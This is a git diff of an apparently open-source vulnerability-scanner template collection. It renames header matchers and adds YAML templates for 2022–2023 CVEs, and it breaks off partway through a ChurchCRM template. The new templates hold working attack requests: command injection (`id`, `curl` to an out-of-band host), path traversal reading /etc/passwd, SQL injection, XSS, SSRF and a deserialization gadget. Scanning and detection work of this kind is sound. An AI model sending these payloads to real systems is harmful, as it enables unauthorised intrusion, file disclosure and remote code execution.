aa7c9ecacb..c4bea67748 100644 --- a/http/cves/2022/CVE-2022-3578.yaml +++ b/http/cves/2022/CVE-2022-3578.yaml @@ -40,7 +40,7 @@ http: matchers: - type: dsl dsl: - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'status_code_2 == 200' - 'contains(body_2, "Extension Options")' - 'contains(body_2, "&tab")' diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml index 753d6b8c9d..445cfe090b 100644 --- a/http/cves/2022/CVE-2022-3933.yaml +++ b/http/cves/2022/CVE-2022-3933.yaml @@ -41,7 +41,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, ">")' - 'contains(body_2, "ere_property_gallery")' condition: and diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml index 3d9d04d10e..4204813f1e 100644 --- a/http/cves/2022/CVE-2022-3982.yaml +++ b/http/cves/2022/CVE-2022-3982.yaml @@ -77,7 +77,7 @@ http: matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d') condition: and diff --git a/http/cves/2022/CVE-2022-40022.yaml b/http/cves/2022/CVE-2022-40022.yaml new file mode 100644 index 0000000000..b2b7d07a70 --- /dev/null +++ b/http/cves/2022/CVE-2022-40022.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-40022 + +info: + name: Symmetricom SyncServer Unauthenticated - Remote Command Execution + author: DhiyaneshDK + severity: critical + description: | + Microchip Technology (Microsemi) SyncServer S650 was discovered to contain a command injection vulnerability. + reference: + - http://packetstormsecurity.com/files/172907/Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-40022 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-40022 + metadata: + max-request: 1 + shodan-query: html:"Symmetricom SyncServer" + verified: "true" + tags: cve,cve2022,syncserver,rce,unauth + +http: + - raw: + - | + POST /controller/ping.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/controller/ping.php + + currentTab=ping&refreshMode=ðDirty=false&snmpCfgDirty=false&snmpTrapDirty=false&pingDirty=false&hostname=%60id%60&port=eth0&pingType=ping + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+)" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 302 diff --git a/http/cves/2022/CVE-2022-42095.yaml b/http/cves/2022/CVE-2022-42095.yaml index 6cc6d1f8dd..837a44b5fa 100644 --- a/http/cves/2022/CVE-2022-42095.yaml +++ b/http/cves/2022/CVE-2022-42095.yaml @@ -53,7 +53,7 @@ http: - type: dsl dsl: - "status_code_5 == 200" - - "contains(all_headers_5, 'text/html')" + - "contains(header_5, 'text/html')" - 'contains(body_5, "")' - "contains(body_5, 'Backdrop CMS')" condition: and diff --git a/http/cves/2022/CVE-2022-4325.yaml b/http/cves/2022/CVE-2022-4325.yaml index d403fd3e94..0b5bf3acdd 100644 --- a/http/cves/2022/CVE-2022-4325.yaml +++ b/http/cves/2022/CVE-2022-4325.yaml @@ -41,7 +41,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "")' - 'contains(body_2, "Post Status Notifier Lite")' condition: and diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml new file mode 100644 index 0000000000..283e841fc2 --- /dev/null +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-0126 + +info: + name: SonicWall SMA1000 LFI + author: tess + severity: high + description: | + Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0126 + - https://github.com/advisories/GHSA-mr28-27qx-phg3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-0126 + cwe-id: CWE-22 + metadata: + max-request: 1 + shodan-query: title:"Appliance Management Console Login" + verified: "true" + tags: cve,cve2023,sonicwall,lfi,sma1000 + +http: + - method: GET + path: + - '{{BaseURL}}/images//////////////////../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: word + part: header + words: + - content/unknown + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml new file mode 100644 index 0000000000..f8668bf4ad --- /dev/null +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-0562 + +info: + name: Bank Locker Management System v1.0 - SQL Injection + author: Harsh + severity: critical + description: | + A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. + reference: + - https://vuldb.com/?ctiid.219716 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0562 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-0562 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: true + tags: cve,cve2023,blms,sqli,bypass + +http: + - raw: + - | + POST /banker/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "admin")' + - 'contains(body, "BLMS | Dashboard")' + condition: and diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml new file mode 100644 index 0000000000..88a912caeb --- /dev/null +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-0563 + +info: + name: Bank Locker Management System - Cross-Site Scripting + author: Harsh + severity: medium + description: | + A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. + reference: + - https://vuldb.com/?ctiid.219717 + - https://nvd.nist.gov/vuln/detail/CVE-2023-0563 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2023-0563 + cwe-id: CWE-79 + metadata: + max-request: 1 + verified: true + tags: cve,cve2023,blms,xss + +http: + - raw: + - | + POST /search-locker-details.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "/>")' + - 'contains(body, "Bank Locker Management System")' + condition: and diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml new file mode 100644 index 0000000000..2f947cd0f3 --- /dev/null +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -0,0 +1,49 @@ +id: CVE-2023-0630 + +info: + name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection + author: DhiyaneshDK + severity: high + description: | + The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query. + remediation: Fixed in version 4.9.3.3 + reference: + - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55 + - https://wordpress.org/plugins/wp-slimstat + - https://nvd.nist.gov/vuln/detail/CVE-2023-0630 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2023-0630 + cwe-id: CWE-89 + cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat] + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'duration_2>=7' + - 'status_code_2 == 200' + - 'contains(content_type_2, "application/json")' + - 'contains(body_2, "audioShortcodeLibrary")' + condition: and diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 8d6238b283..503b1e4f1b 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -42,7 +42,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "/onmouseover=alert(document.domain)//")' - 'contains(body_2, "Watu Quizzes")' condition: and diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 22010453c1..9ad4f32695 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -42,7 +42,7 @@ http: - type: dsl dsl: - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' + - 'contains(header_2, "text/html")' - 'contains(body_2, "/ onmouseover=alert(document.domain);//")' - 'contains(body_2, "GN Publisher")' condition: and diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index c993ac399f..83b6789050 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -29,6 +29,6 @@ http: - type: dsl dsl: - "status_code_1 == 200" - - "!regex('X-Frame-Options', all_headers)" + - "!regex('X-Frame-Options', header)" - "contains(body, 'BUMSys')" condition: and diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 51334610af..aa7ecc08df 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -4,6 +4,8 @@ info: name: Odoo - Cross-Site Scripting author: DhiyaneshDK severity: medium + description: | + Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. reference: - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434 diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml new file mode 100644 index 0000000000..f175f4edb3 --- /dev/null +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-1454 + +info: + name: Jeecg-boot 3.5.0 qurestSql - SQL Injection + author: DhiyaneshDK + severity: critical + description: | + A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + reference: + - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master + - https://nvd.nist.gov/vuln/detail/CVE-2023-1454 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-1454 + cwe-id: CWE-89 + metadata: + max-request: 1 + verified: "true" + shodan-query: http.favicon.hash:1380908726 + tags: cve,cve2023,jeecg,sqli + +http: + - raw: + - | + POST /jeecg-boot/jmreport/qurestSql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SQLException" + - "XPATH syntax error:" + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - "XPATH syntax error: '([a-z_@%]+)'" + - "XPATH syntax error: '([a-z- @%]+)'" + - "XPATH syntax error: '([a-z@%0-9.]+)'" diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index dc09161e16..68d46e58d7 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -15,10 +15,10 @@ info: cve-id: CVE-2023-1671 cwe-id: CWE-77 metadata: - fofa-query: title="Sophos Web Appliance" max-request: 1 - shodan-query: title:"Sophos Web Appliance" verified: true + shodan-query: title:"Sophos Web Appliance" + fofa-query: title="Sophos Web Appliance" tags: cve,cve2023,rce,sophos,oast http: @@ -27,10 +27,10 @@ http: POST /index.php?c=blocked&action=continue HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: curl/7.86.0 args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}} + matchers-condition: and matchers: - type: word part: interactsh_protocol diff --git a/http/cves/2023/CVE-2023-20887.yaml b/http/cves/2023/CVE-2023-20887.yaml new file mode 100644 index 0000000000..0a9e20d502 --- /dev/null +++ b/http/cves/2023/CVE-2023-20887.yaml @@ -0,0 +1,60 @@ +id: CVE-2023-20887 + +info: + name: VMware VRealize Network Insight - Remote Code Execution + author: sinsinology + severity: critical + description: | + VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are + vulnerable. + reference: + - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ + - https://github.com/sinsinology/CVE-2023-20887 + - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-score: 9.8 + cve-id: CVE-2023-20887 + epss-score: 0.00172 + metadata: + max-request: 1 + verified: true + shodan-query: title:"VMware vRealize Network Insight" + fofa-query: title="VMware vRealize Network Insight" + tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast + +variables: + cmd: "curl {{interactsh-url}}" + +http: + - raw: + - | + POST /saas./resttosaasservlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-thrift + + [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"rec":' + + - type: word + part: header + words: + - "application/x-thrift" + + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Provided invalid node Id" + - "Invalid nodeId" + negative: true diff --git a/http/cves/2023/CVE-2023-20888.yaml b/http/cves/2023/CVE-2023-20888.yaml new file mode 100644 index 0000000000..ace34f0942 --- /dev/null +++ b/http/cves/2023/CVE-2023-20888.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-20888 + +info: + name: VMware Aria Operations for Networks - Remote Code Execution + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + reference: + - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-20888 + classification: + cve-id: CVE-2023-20888 + metadata: + verified: true + shodan-query: title:"VMware Aria Operations" + max-request: 2 + tags: cve,cve2023,vmware,aria,rce,authenticated,oast + +http: + - raw: + - | + POST /api/auth/login HTTP/2 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Vrni-Csrf-Token: null + + {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} + + - | + POST /api/events/push-notifications HTTP/2 + Host: {{Hostname}} + X-Vrni-Csrf-Token: {{csrf}} + Content-Type: application/json + + {"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - dns + + - type: status + status: + - 500 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'csrfToken":"([a-z0-9A-Z/+=]+)"' + internal: true diff --git a/http/cves/2023/CVE-2023-20889.yaml b/http/cves/2023/CVE-2023-20889.yaml new file mode 100644 index 0000000000..328dc7c1a6 --- /dev/null +++ b/http/cves/2023/CVE-2023-20889.yaml @@ -0,0 +1,79 @@ +id: CVE-2023-20889 + +info: + name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + reference: + - https://www.zerodayinitiative.com/advisories/ZDI-23-842/ + - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-20889 + classification: + cve-id: CVE-2023-20889 + metadata: + verified: true + shodan-query: title:"VMware Aria Operations" + max-request: 2 + tags: cve,cve2023,vmware,aria,disclosure,authenticated,rce,oast + +variables: + payload: "location='http://{{interactsh-url}}'" + +http: + - raw: + - | + POST /api/auth/login HTTP/2 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + X-Vrni-Csrf-Token: null + + {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} + + - | + POST /api/pdfexport HTTP/2 + Host: {{Hostname}} + X-Vrni-Csrf-Token: {{csrf}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh + + ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh + Content-Disposition: form-data; name="{{randstr}}" + + + + + Test + + +

+ + + ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh-- + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - dns + - http + + - type: word + part: header_2 + words: + - 'application/octet-stream' + + - type: status + status: + - 200 + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'csrfToken":"([a-z0-9A-Z/+=]+)"' + internal: true diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml new file mode 100644 index 0000000000..4b2898b134 --- /dev/null +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-23333 + +info: + name: SolarView Compact 6.00 - OS Command Injection + author: Mr-xn + severity: critical + description: | + SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php. + reference: + - https://github.com/Timorlover/CVE-2023-23333 + - https://github.com/Mr-xn/CVE-2023-23333 + - https://nvd.nist.gov/vuln/detail/CVE-2023-23333 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-23333 + cwe-id: CWE-77 + epss-score: 0.95016 + metadata: + max-request: 1 + verified: true + shodan-query: http.html:"SolarView Compact" + fofa-query: body="SolarView Compact" && title="Top" + tags: cve,cve2023,solarview,rce + +variables: + cmd: "echo+CVE-2023-23333|rev" + +http: + - raw: + - | + @timeout: 25s + GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '33332-3202-EVC' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml new file mode 100644 index 0000000000..d8080e3ae6 --- /dev/null +++ b/http/cves/2023/CVE-2023-24243.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-24243 + +info: + name: CData RSB Connect v22.0.8336 - Server Side Request Forgery + author: ritikchaddha + severity: high + description: | + CData RSB Connect v22.0.8336 was discovered to contain a Server-Side Request Forgery (SSRF). + reference: + - https://twitter.com/W01fh4cker/status/1669890019191037952 + - https://gist.github.com/d3vc0r3/6460a5f006e32a2ebffe739e411ab1b8 + - https://nvd.nist.gov/vuln/detail/CVE-2023-24243 + classification: + cve-id: CVE-2023-24243 + metadata: + fofa-query: icon_hash="163538942" + max-request: 1 + shodan-query: http.favicon.hash:163538942 + verified: true + tags: cve,cve2023,cdata,rsb,ssrf + +http: + - method: GET + path: + - "{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: status + status: + - 404 diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml new file mode 100644 index 0000000000..dad3fd6812 --- /dev/null +++ b/http/cves/2023/CVE-2023-24488.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-24488 + +info: + name: Citrix Gateway and Citrix ADC - Cross-Site Scripting + author: johnk3r + severity: medium + description: | + Citrix ADC and Citrix Gateway versions before 13.1 and 13.1-45.61, 13.0 and 13.0-90.11, 12.1 and 12.1-65.35 contain a cross-site scripting vulnerability due to improper input validation. + reference: + - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488 + - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-24488 + - https://twitter.com/infosec_au/status/1674786106381070342 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-24488 + cwe-id: CWE-79 + metadata: + max-request: 1 + shodan-query: title:"Citrix Gateway" + tags: cve,cve2023,citrix,xss,adc + +http: + - method: GET + path: + - '{{BaseURL}}/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a' + + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(to_lower(body), "content-type: text/html")' + - 'status_code == 302' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml new file mode 100644 index 0000000000..d2d0ff434c --- /dev/null +++ b/http/cves/2023/CVE-2023-25157.yaml @@ -0,0 +1,70 @@ +id: CVE-2023-25157 + +info: + name: GeoServer OGC Filter - SQL Injection + author: ritikchaddha,DhiyaneshDK,iamnoooob,rootxharsh + severity: critical + description: | + GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse. + reference: + - https://twitter.com/parzel2/status/1665726454489915395 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25157 + - https://github.com/win3zz/CVE-2023-25157 + - https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-25157 + cwe-id: CWE-89 + cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + shodan-query: title:"geoserver" + verified: "true" + tags: cve,cve2023,geoserver,ogc,sqli,intrusive + +http: + - raw: + - | + GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1 + Host: {{Hostname}} + + - | + GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 30s + GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + iterate-all: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "SQL SELECT" + + - type: word + part: header_3 + words: + - text/xml + + extractors: + - type: regex + part: body_1 + group: 1 + name: name + regex: + - '(.*?)<\/Name>' + internal: true + + - type: regex + part: body_2 + group: 1 + name: column + regex: + - 'FID,([aA-zZ_]+),' + internal: true diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml new file mode 100644 index 0000000000..5f7fde1dbf --- /dev/null +++ b/http/cves/2023/CVE-2023-25346.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-25346 + +info: + name: ChurchCRM 4.5.3 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found. + reference: + - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346 + - https://nvd.nist.gov/vuln/detail/CVE-2023-25346 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-25346 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,churchcrm,xss,authenticated + +http: + - raw: + - | + POST /session/begin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + User={{username}}&Password={{password}} + + - | + GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "<script>alert(document.domain)</script>")' + - 'contains(body_2, "ChurchCRM")' + condition: and diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml new file mode 100644 index 0000000000..6c89c80b4d --- /dev/null +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-26842 + +info: + name: ChurchCRM 4.5.3 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php. + reference: + - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26842 + - https://nvd.nist.gov/vuln/detail/CVE-2023-26842 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2023-26842 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,churchcrm,stored,xss,authenticated + +http: + - raw: + - | + POST /session/begin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + User={{username}}&Password={{password}} + + - | + POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + 1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=" onfocus=alert(document.domain) autofocus="&AddField=Add+New+Person+Classification + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onfocus=alert(document.domain) autofocus=")' + - 'contains(body_2, "ChurchCRM")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml new file mode 100644 index 0000000000..6a91a88389 --- /dev/null +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-26843 + +info: + name: ChurchCRM 4.5.3 - Cross-Site Scripting + author: Harsh + severity: medium + description: | + A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php. + reference: + - 